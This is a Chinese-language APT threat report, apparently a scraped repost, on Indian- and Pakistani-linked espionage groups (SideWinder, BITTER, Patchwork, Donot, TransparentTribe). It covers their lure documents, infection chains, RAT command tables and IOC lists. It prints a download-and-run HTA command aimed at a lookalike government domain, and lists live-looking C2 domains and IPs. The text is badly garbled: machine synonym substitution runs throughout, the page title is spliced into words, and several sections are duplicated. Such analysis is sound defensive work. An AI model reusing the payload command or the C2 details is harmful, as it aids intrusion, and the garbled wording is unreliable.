加入收藏 | 设为首页 |

一击男-印巴战役暗影下的网络战:近期印巴APT安排进犯活动汇总

海外新闻 时间: 浏览:267 次

一、布景

印度和巴基斯坦同归于南亚区域的两个国家,可是因为一些前史原因,两国联系一向不大友善,抵触不断。从2019年头开端,两边联系忽然严重,抵触晋级。2月26日,印度空军飞越克什米尔印巴实践操控线,被巴基斯坦军方击落并抓获一名印度空军飞行员,一同这也是印度初次突击巴基斯坦境内。前段时刻两国在克什米尔印戎行集结而且频频交火,印方乃至水淹巴基斯坦,翻开阿尔奇大坝,形成巴基斯坦面对洪水的危机,一同印方几日前揭露声称,或许会先对巴基斯坦运用核武办法。

跟着两边的军事抵触愈演愈烈时,网络战场上也硝烟四起。就在印度空军被俘事情后,腾讯安全御见要挟情报中心曾捕获并发布了一例以此次抵触事情为钓饵的APT进犯样本,剖析后确认了该样本源于巴基斯坦的APT进犯安排TransparentTribe(见参阅文章1),此外印度针对巴基斯坦的进犯活动也一向在继续中,腾讯安全御见要挟情报中心也曾屡次发布相关的剖析陈述(见参阅文章2、3)。

网络战被认为是地缘政治的延伸,乃至是战役和抵触的一部分。APT进犯做为网络战中的重要进犯活动,其活泼趋势跟地缘政治等全球热点问题密切相关,全球APT进犯高发区域也是全球地缘政治抵触的灵敏地域。纵观2019年活泼的网络进犯活动,无一不是政治形势杂乱和灵敏的地域,包括朝鲜半岛、委内瑞拉、中东等等。网络战已成为国家间政治博弈乃至是现代战役的重要组成部分。

回到印巴抵触中,腾讯安全御见情报要挟中心捕获到很多关于印巴网络进犯的歹意样本。通过深度剖析和盯梢溯源,咱们归类出较为活泼的几个APT安排,包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot,TransparentTribe等。一同在剖析溯源的过程中,咱们还发现APT安排之间彼此假装,企图来混杂安全人员剖析,逃避追寻。本文为对该些活动和安排的一些总结,或许会存在必定的遗漏,还请业界同行再作弥补。

二、疑似来自印度的进犯

印方在对巴基斯坦的网络进犯活动中,一向处于强势和主导的境地,还涉及到跟印度相关的APT进犯安排也相对较多,较有代表性的包括SideWinder(响尾蛇),BITTER(蔓灵花),白象、Donot等。

1、SideWinder(响尾蛇)

安排概略

SideWinder(响尾蛇)是腾讯安全御见情报要挟中心最早在2018年发表的APT进犯安排,得名由来为该安排的布景跟卡巴斯基在2018年第一季度陈述中说到的SideWinder安排十分的类似,尽管卡巴斯基并未发布任何该安排的技能细节和陈述。即使如此,咱们仍是继续沿袭卡巴斯基的命名,命名该安排为”响尾蛇”。

该安排的最早的进犯活动能够追溯到 2012 年。在2019年2月,腾讯安全御见情报要挟中心再次具体的发表过该安排在2018年下半年的一些进犯活动。此外,国内有多个安全公司也一同发表过该安排的其他的一些进犯活动。

进犯方针

首要为巴基斯坦政府部分(如内阁部分)、巴基斯坦军方、军事方针等

技能手段

SideWinder(响尾蛇)首要选用鱼叉进犯的方法,投递带有缝隙的office文档或许包括歹意lnk的压缩包文件,受害者翻开office文档或许歹意lnk文件后会下载履行hta文件,通过履行hta脚本进一步下载后门RAT。

如某次进犯的垂钓邮件:

如某次进犯的钓饵:

钓饵名 钓饵hash 上传日期 钓饵类型 PassportchangeProfession.zip 050dd090b5af80fb73b2d6e6c8a3adc9 2019-07-15 14:37:20 ZIP

压缩包解压后为一个歹意的lnk文件:

履行指令:

%windir%\system32\mshtb.exehttp://www.download.fbr.gov.pk.cdn-ps.net/images/5DC7A431/11991/5183/fad436c7/60b9f1d

履行的脚本后,除了搜集本地杀软信息外,还会解密钓饵pdf文件内容而且翻开,跟着继续下载下一阶段的hta脚本。

翻开的钓饵pdf内容为:

hta脚本为终究会运用一个白加黑技能,来履行终究的后门文件SystemApp.dll,该后门用来进行信息的搜集,包括体系信息、文件信息等。

白加黑文件:

后门内容:

此外,其他的进犯中,该安排还会运用VB的RAT,如:

安排小结

项目类型 内容 安排称号 响尾蛇(SideWinder、T-APT-04) 进犯方针 政府部分、军方、军事方针 进犯国家 巴基斯坦 进犯意图 盗取灵敏材料、信息等 进犯时刻 从2012年继续至今 曝光时刻 最早在2018年5月被腾讯御见要挟情报中心曝光 进犯方法 鱼叉进犯->hta->白+黑(Rat) 钓饵类型 Doc、lnk等 编程言语 VB、js、vbs、powershell、C#等 进犯渠道 Windows、Android等 进犯者 疑似来自印度 2、BITTER(蔓灵花) & Patchwork(白象)& White Company &Confucius(孔子)

安排概略

之所以把这几个安排放在一同,是因为咱们信任,该四个安排之间都存在必定的相关,乃至为同一安排或同一安排分解出来的不同的小组。如BITTER(蔓灵花)跟Patchwork(白象)和还有Confucius(孔子),咱们不止一次的在咱们的剖析陈述中指出存在包括武器库、基础设施等的共用的依据,如《蔓灵花(BITTER)APT安排针对我国境内政府、军工、核能等灵敏安排的最新进犯活动陈述》等。

其间,蔓灵花最早在2016由美国安全公司Forcepoint进行了发表,而且命名为“BITTER”,得名由来为前期的特马的数据包中都包一击男-印巴战役暗影下的网络战:近期印巴APT安排进犯活动汇总括字符“BITTER”做为标识,因而得名。同年国内友商360也跟进发布了剖析陈述,命名为“蔓灵花”。当然该安排除了针对巴基斯坦进行进犯外,也在频频的针对我国大陆的方针进行进犯活动。

白象安排,也叫摩诃草、Patchwork、HangOver,该最早能够追溯到2009年11月,至今还十分活泼。相同该安排除了针对巴基斯坦进行进犯外,也在频频的针对我国大陆的方针进行进犯活动。

White Company为2018年由cylance公司发表的APT安排,尽管该公司的陈述中未明确指出该安排的布景,可是从咱们的剖析发现,该安排相同来自印度,而且咱们也进一步发现,该安排的武器库和白象相堆叠。

Confucius(孔子)为Palo Alto Networks Unit 42在2016年发现针对南亚特定人群的要挟安排。该安排在歹意代码和基础设施上与白象和蔓灵花均存在堆叠,但方针稍有不同。

进犯方针

安排进犯方针BITTER(蔓灵花) 政府部分(尤其是外交安排)、军工企业、核能企业等 Patchwork(白象) 政府安排、科研教育安排和研究所 White Company 政府、军方、军事方针 Confucius(孔子) 政府、司法部分、军方

技能手段

这几个安排都习气运用鱼叉进犯的方法,投递含有缝隙或宏的office文档、带有缝隙的InPage文件、自解压文件等。

如蔓灵花的钓饵文档:

如白象的钓饵:

如Confucius(孔子)的钓一击男-印巴战役暗影下的网络战:近期印巴APT安排进犯活动汇总饵:

而履行钓饵文档后,终究的武器库也略有不同。

如蔓灵花:

蔓灵花第一阶段木马一般都为一个downloader,除了下载第二阶段的相关木马外,还会搜集用户的相关信息,如上报信息:

“?a=administ-b24c70&b=ADMINIST-B24C70&c=Microsoft%20Windows%20XP&d=AdministratorAdministrator3fb4c154-b52a-4667-8a49-4fbe422781b5365536040965860&e=”

上报内容包括主机名、核算机名、操作体系名、用户名等。

而第二阶段为下发相应的插件,插件内容包括增加开机发动、键盘记录、终究的远控木马等。

此外,蔓灵花还存在一些运用习气,如文件目录习气运用new_downloader_xxx:

而下载地址习气运用healthne:

序号 插件下载地址 插件功用 1 地址/healthne/healthne/regdl 增加开机发动 2 地址/healthne/healthne/igfxsrvk 键盘记录 3 地址/healthne/healthne/spoolvs 终究的远控木马

如白象:

本年最常运用的特马为名为badnews的特马,运用github和feed43等共用渠道用来分发C&C:

特马功用:

指令号 功用 0 退出木马进程,完毕操控 8 获取键盘记录:上传TPX498.dat,即键盘记录文件 23 获取截屏:截屏并存储为TPX499.dat,并上传 13 上传文件:读取指定文件内容写入到AdbFle.tmp,并上传 4 获取文档文件目录列表:上传edg499.dat并删去,再运行一次木马自hope身 5 上传指定路劲的文件 33 下载文件:从指定URL下载文件,并履行

安排联系

咱们之前的文章现已屡次指出了BITTER、白象、Confucius之间的联系,本文侧重描绘下白象跟White Company之间的联系。

如咱们从确认白象的某个样本中(97187e5e8b9a752b5f6377df3bea17b5),发现了样本中包括了提权缝隙CVE-2016-7255的模块:

把该模块dump下来后,依据模块的特征咱们进行查找,发现了某篇文章中:

跟文章中的代码彻底类似(https://www.alienvault.com/blogs/labs-research/off-the-shelf-rats-targeting-pakistan):

而咱们对该缝隙的一切揭露运用的代码通过查找,以及对该模块的特征进行查找,均未在其他的进犯活动中发现跟该模块匹配的运用代码和代码结构,因而咱们判别该特权运用模块为该安排特有,而该文章曝光的活动的安排跟白象为同一个或许能通用武器库的进犯小组。

而继续对该文章中发表的安排进行研究,咱们发现该进犯安排就位cylance曝光的White Company:

安排小结

项目类型 内容 安排称号 BITTER(蔓灵花) Patchwork(白象) White Company Confucius(孔子) 进犯方针 政府部分(尤其是外交安排)、军工企业、核能企业等 政府安排、科研教育安排和研究所 政府、军方、军事方针 政府、司法部分、军方 进犯国家 巴基斯坦、我国等 巴基斯坦、我国等 巴基斯坦 巴基斯坦 进犯意图 盗取灵敏材料、信息等 盗取灵敏材料、信息等 盗取灵敏材料、信息等 盗取灵敏材料、信息等 进犯时刻 至少从2013年继续至今 至少从2009年继续至今 至少从2016年继续至今 至少从2013年继续至今 曝光时刻 2016由美国安全公司Forcepoint进行了发表 2016年Cymmetria对该安排进行了发表 2018年由cylance公司发表 2018由趋势科技(trendmicro)进行了发表 进犯方法 鱼叉进犯->Zip->自解压程序->第一阶段downloader->下载分发插件 鱼叉进犯->Zip->白运用->RAT 鱼叉进犯->Zip->RAT 鱼叉进犯->Zip->RAT 钓饵类型 Office、自解压、InPage、apk等 Office、apk等 Office Inpage、apk等 编程言语 C++、java等 C++、java、.net C++、delphi、.net等 C++、delphi、java等 进犯渠道 Windows、Android等 Windows、Android等 Windows Windows、Android等 进犯者 疑似来自印度 疑似来自印度 疑似来自印度 疑似来自印度 3、Donot Team

安排概略

Donot Team是2018年被曝光的APT进犯安排,最早在2018年3月由NetScout公司的ASERT团队进行了发表,随后国内的厂商奇安信也进行了发表。该安排的得名由来为某进犯文件中的pdb中含有donot(如样本59733668b3ad8056ffd4c5c9db876cbc,pdb为:C:\Users\donot\Documents\Visual Studio2010\Projects\downloader\Debug\downloader.pdb),因而取名为DonotTeam,国内的安全厂商奇安信通过音译命名为肚脑虫,咱们继续沿袭该命名。该安排首要针对巴基斯坦进行进犯活动。

进犯方针

巴基斯坦政府部分、巴基斯坦军方、金融安排、外贸人士等

技能手段

Donot Team一般会投递带有歹意宏的office文档文件,文档名和文档内容都具有很强的针对性。

如运用巴基斯坦空军的钓饵:

如假装巴基斯坦国家银行Excel核算器:

当受害者翻开office歹意样本后,会提示履行宏代码,点击履行后会开释包括脚本和后门程序的压缩包,然后解压履行脚本,脚本终究会发动后门木马。

相关宏代码:

开释的压缩包:

履行脚本代码:

终究履行的歹一击男-印巴战役暗影下的网络战:近期印巴APT安排进犯活动汇总意文件,会依据回来的Content-Typel来进行下一步行为:

1) 当回来的为application时则会将回来的包解码exe后存储到%userprofile%\\DriveData\\Files\\目录下。

2) 当回来的是cmdline时,则会履行%userprofile%\\DriveData\\Files\\wuaupdt.exe

3) 当回来的是batcmd的时,则会履行%userprofile%\\DriveData\\Files\\test.bat

4) 除了windows上的进犯外,Donot Team还具有移动端的进犯才能。如运用安卓特马StealJob的进犯流程(来历奇安信博客剖析,见参阅文章4):

1) 当回来的为application时则会将回来的包解码exe后存储到%userprofile%\\DriveData\\Files\\目录下。

2) 当回来的是cmdline时,则会履行%userprofile%\\DriveData\\Files\\wuaupdt.exe

3) 当回来的是batcmd的时,则会履行%us一击男-印巴战役暗影下的网络战:近期印巴APT安排进犯活动汇总erprofile%\\DriveData\\Files\\test.bat

4) 除了windows上的进犯外,Donot Team还具有移动端的进犯才能。如运用安卓特马StealJob的进犯流程(来历奇安信博客剖析,见参阅文章4):

相关功用:

操控指令 指令意义 live_recording_scheduling_job 进行录音操控 tag_network_info_job 获取网络情况并上传 tag_directory_trees_job 获取手机文件目录并上传 tag_live_recordings_job 录音并上传录音文件 tag_key_logs_job 获取密钥日志并上传 tag_user_profile_job 获取通讯录并上传 tag_location_job 获取地理方位并上传 tag_apps_info_job 获取手机已装置运用并上传 test_job 测验 tag_sms_job 获取用户手机短信并上传 tag_calls_logs_job 获取用户手机通讯录并上传 tag_control_info_retrieval_job 检索操控信息 tag_notifications_job 获取告诉并上传 tag_location_sender_job 获取方位并上传 tag_files_sending_job 上传文件 polling_job 对程序自身功用进行监控,并做出相应的操作 tag_contacts_job 获取手机IMEI并上传 tag_call_recordings_job 获取通话录音并上传 tag_device_info_job 获取手机固件信息并上传 tag_key_exchange_job 密钥交流

安排小结

项目类型 内容 安排称号 肚脑虫(Donot Team) 进犯方针 巴基斯坦政府部分、巴基斯坦军方、金融安排、外贸人士等 进犯国家 巴基斯坦 进犯意图 盗取灵敏材料、信息等 进犯时刻 从2017年继续至今 曝光时刻 最早在2018年3月由NetScout公司的ASERT团队进行了发表 进犯方法 鱼叉进犯->Zip->RAT 钓饵类型 Office、Apk等 编程言语 VB、C++、java等 进犯渠道 Windows、Android等 进犯者 疑似来自印度 三、疑似来自巴基斯坦的进犯

巴方在对印度的网络进犯活动中,一向处于弱势和挨揍的位置,现在发现的相关的APT进犯安排也相对较少,较有代表性的是TransparentTribe。

安排概略

TransparentTribe APT安排,又称ProjectM、C-Major,该安排的活动最早能够追溯到2012年。该安排的相关活动在2016年3月被proofpoint发表,趋势科技随后也跟进进行了相关活动的发表。

腾讯安全御见要挟情报中心曾在上半年曝光过该安排的相关进犯活动《TransparentTribeAPT安排2019年一击男-印巴战役暗影下的网络战:近期印巴APT安排进犯活动汇总针对印度政府、军事方针的进犯活动陈述》。

进犯方针

印度政府、印度军方、军事研究安排等。

技能手段

TransparentTribe一般投递带有歹意宏的office文档,钓饵文档内容多与政府、军事相关,当受害者翻开歹意文档后,会提示履行宏代码,一般点击履行后钓饵内容才会显示出来。

如跟印度陆战研究中心(CLAWS)相关钓饵:

如跟印度国防学院(NDC)相关钓饵:

宏代码履行后会开释一个压缩包文件,并解压出包括的木马后门履行:

在后门运用上,该安排仍旧运用CrimsonRAT、.net loader、.net droper、PeppyRAT 相关特马:

而通过腾讯安全御见要挟情报中心的数据溯源,该安排疑似跟巴基斯坦别的一个安排GorgonGroup有必定的相关:

安排小结

项目类型 内容 安排称号 TransparentTribe、ProjectM、C-Major 进犯方针 政府、军方、军事研究安排等 进犯国家 印度 进犯意图 盗取灵敏材料、信息等 进犯时刻 从2012年继续至今 曝光时刻 最早在2016年3月被proofpoint发表 进犯方法 鱼叉进犯->Zip->RAT 钓饵类型 Office等 编程言语 VBS、C#、Python等 进犯渠道 Windows等 进犯者 疑似来自巴基斯坦 四、存在的假旗(false flag)

在印巴两边网络战继续不断时,其间Donot Team和TransparentTribe 两个APT安排引起咱们分外的留意,通过具体剖析后发现两个疑似仇视安排不断的相互仿照,影响安全研究人员对其追寻溯源。

例如Donot样本宏代码和TransparentTribe样本宏代码高度类似,能够看到Donot宏代码注释的当地,注释的这段代码是要履行的exe途径,可是Donot实践上履行的是bat脚本,咱们再对比下TransparentTribe就能发现,TransparentTribe才是履行exe的。而且Donot样本中这段被注释的代码与TransparentTribe样本中的共同(左面Donot,右边TransparentTribe):

而且部分代码函数都是如出一辙的,函数命名和常量值(左一击男-印巴战役暗影下的网络战:近期印巴APT安排进犯活动汇总面Donot,右边TransparentTribe):

乃至在某些样本中两个APT安排开释的木马称号都彻底相同(左面Donot,右边TransparentTribe):

咱们信任,印巴两边的安排还会继续仿照下去,这必然给安全研究人员在定性上发生更多的搅扰。

五、总结

从上文能够看到,因为印巴两国的长期以来的严重联系,网络进犯一向都没中止过。即使两国的活动屡次被安全公司所曝光,可是各自国家的安排彻底没中止进犯的意思,相反是越来越强烈。2019年对印巴两国来说,是个不安静的一年,双方的形势抵触不断,网络战也一浪高过一浪。咱们信任,这种网络抗衡会继续进行下去。

没有网络安全就没有国家安全,跟着政治形势的恶化,网络战必然会愈演愈烈。尽管咱们处于平和时代,可是咱们的相关部分和单位切记要进步警觉,保证要点部分和单位的网络安全。

六、安全主张

针对重要政府安排、要点企业、科研单位的APT进犯,现已成为网络战布景下的日常狙击活动,进犯者平常以探听情报、侵略浸透为主,一旦抵触加重,随时或许提高进犯损坏的烈度。腾讯安全专家主张相关灵敏单位加强网络信息体系安全办理,加强对职工的安全意识教育,防患于未然。可参阅以下几点:

1、主张不要翻开不明来历的邮件附件;除非十分清楚文档来历牢靠,不然主张不要启用Office履行宏代码;

2、及时装置体系补丁和重要软件的补丁;

3、运用杀毒软件防护或许的病毒木马进犯,主张全网装置御点终端安全办理体系

1、主张不要翻开不明来历的邮件附件;除非十分清楚文档来历牢靠,不然主张不要启用Office履行宏代码;

2、及时装置体系补丁和重要软件的补丁;

3、运用杀毒软件防护或许的病毒木马进犯,主张全网装置御点终端安全办理体系

(https://s.tencent.com/product/yd/index.html)。御点终端安全办理体系具有终端杀毒统一管控、修正缝隙统一管控,以及战略管控等全方位的安全办理功用,可协助企业办理者全面了解、办理企业界网安全情况、维护企业安全。

4、运用腾讯御界高档要挟检测体系,及时发现APT进犯的蛛丝马迹。腾讯御界高档要挟检测体系,是根据腾讯安全反病毒实验室的安全才能、依托腾讯在云和端的海量数据,研宣布的共同要挟情报和歹意检测模型体系。更多信息可参阅官方网站(https://s.tencent.com/product/yujie/index.html)

IOCs MD5:

050dd090b5af80fb73b2d6e6c8a3adc9

d78d30c43bdd0251fce773376a2eca24

4d59b084df25e9c6cba6343b753077b3

86938e9ed38f59630ee2318ad5a91f30

7b6fb1c1cf09cb371f8a22ac3c19da10

f64125c34cb209c71ca137513bf9714b

35a9d47a8b6d0fab0a8bfdf1b1381486

9eb7cbd46aa2aa624ae13acb64394b1c

6d3e9283b52086a406358ca914e23837

afffa7af5e795f911434b6e7016fc6e5

3c06cbcb6bb57b688ca30659c6c031a5

e9c8d0d4c74d53566b446e1242947e15

23b4dbbe5f3a44798312c1fd66117221

42b713a261d61c5c00b7704ae1f4b912

561adc55d8a9bf9d6966f7dd234d1e20

a66aa5eb35c67f685cc425c1d04d0f5f

cf665bbf0c208e5eb29ad99f9154bf3e

a6270064f1630cdf5bcda858762db516

7f99acb32db8b99fbe9347d3e69e9063

0a3a423d5cd7628efcc12cdbce378edf

0108a194e11a2d871f5571108087c05d

f7d2b9541d9035d31c637d39d88d18a7

08a8db28207fa13ebb25cf0064d12f17

9c6999f6b2415761fa85d6391dfb4628

f5a5f7af4e46e89e9f2a84cc293f1250

0fa9b24535f55ec64be0f02a75d637b3

43a2dad49d410b143b8a26772d6e71dd

159890b8b9e66cc8138d332d860ddd96

4d401db3dc6172e7b16bcbe7d87fc526

02ba9703d1f250b411ea4c868d17fd2e

db5193d53f7bb509928304ad8326f359

8d8822326f53982b141dc0e7f6cf948a

91e5c5afcf42f8912d5ae3b7dafcda22

96e351e7faf7197677e58a1f6390b0f0

babca0f4ccca5c46f6145580a92284f9

427d28ebedbe8b2b730de1d34435dcb8

050dd090b5af80fb73b2d6e6c8a3adc9

d78d30c43bdd0251fce773376a2eca24

4d59b084df25e9c6cba6343b753077b3

86938e9ed38f59630ee2318ad5a91f30

7b6fb1c1cf09cb371f8a22ac3c19da10

f64125c34cb209c71ca137513bf9714b

35a9d47a8b6d0fab0a8bfdf1b1381486

9eb7cbd46aa2aa624ae13acb64394b1c

6d3e9283b52086a406358ca914e23837

afffa7af5e795f911434b6e7016fc6e5

3c06cbcb6bb57b688ca30659c6c031a5

e9c8d0d4c74d53566b446e1242947e15

23b4dbbe5f3a44798312c1fd66117221

42b713a261d61c5c00b7704ae1f4b912

561adc55d8a9bf9d6966f7dd234d1e20

a66aa5eb35c67f685cc425c1d04d0f5f

cf665bbf0c208e5eb29ad99f9154bf3e

a6270064f1630cdf5bcda858762db516

7f99acb32db8b99fbe9347d3e69e9063

0a3a423d5cd7628efcc12cdbce378edf

0108a194e11a2d871f5571108087c05d

f7d2b9541d9035d31c637d39d88d18a7

08a8db28207fa13ebb25cf0064d12f17

9c6999f6b2415761fa85d6391dfb4628

f5a5f7af4e46e89e9f2a84cc293f1250

0fa9b24535f55ec64be0f02a75d637b3

43a2dad49d410b143b8a26772d6e71dd

159890b8b9e66cc8138d332d860ddd96

4d401db3dc6172e7b16bcbe7d87fc526

02ba9703d1f250b411ea4c868d17fd2e

db5193d53f7bb509928304ad8326f359

8d8822326f53982b141dc0e7f6cf948a

91e5c5afcf42f8912d5ae3b7dafcda22

96e351e7faf7197677e58a1f6390b0f0

babca0f4ccca5c46f6145580a92284f9

427d28ebedbe8b2b730de1d34435dcb8

hxxps://trans-pre.net/ini/sJDts1oInx8fbn0ffcxa3R6L82v5k8Ali9eiPb78/11991/5183/be30afa8

hxxps://trans-pre.net/ini/NrveX8Yi7Mgr06nqM86Wba9uW8LdbbJ2HAaB9zWG/-1/9373/8a7b946c

hxxps://trans-pre.net/ini/sJDts1oInx8fbn0ffcxa3R6L82v5k8Ali9eiPb78/11991/5183/be30afa8

hxxps://trans-pre.net/ini/NrveX8Yi7Mgr06nqM86Wba9uW8LdbbJ2HAaB9zWG/-1/9373/8a7b946c

185.99.133.27

data-backup.online

unique.fontsupdate.com

servicejobs.life

212.32.226.244

111.115.60.18

ezeescan.com

95.168.176.141

185.99.133.27

data-backup.online

unique.fontsupdate.com

servicejobs.life

212.32.226.244

111.115.60.18

ezeescan.com

95.168.176.141

1) TransparentTribe APT安排2019年针对印度政府、军事方针的进犯活动陈述

2) 响尾蛇(SideWinder)APT安排针对南亚的进犯活动发表

3) 疑似白象安排针对巴基斯坦、孟加拉国等南亚国家的最新进犯活动陈述

4) 肚脑虫团伙运用新特种安卓木马StealJob的进犯剖析

6) 针对巴基斯坦的RAT

1) TransparentTribe APT安排2019年针对印度政府、军事方针的进犯活动陈述

2) 响尾蛇(SideWinder)APT安排针对南亚的进犯活动发表

3) 疑似白象安排针对巴基斯坦、孟加拉国等南亚国家的最新进犯活动陈述

4) 肚脑虫团伙运用新特种安卓木马StealJob的进犯剖析

6) 针对巴基斯坦的RAT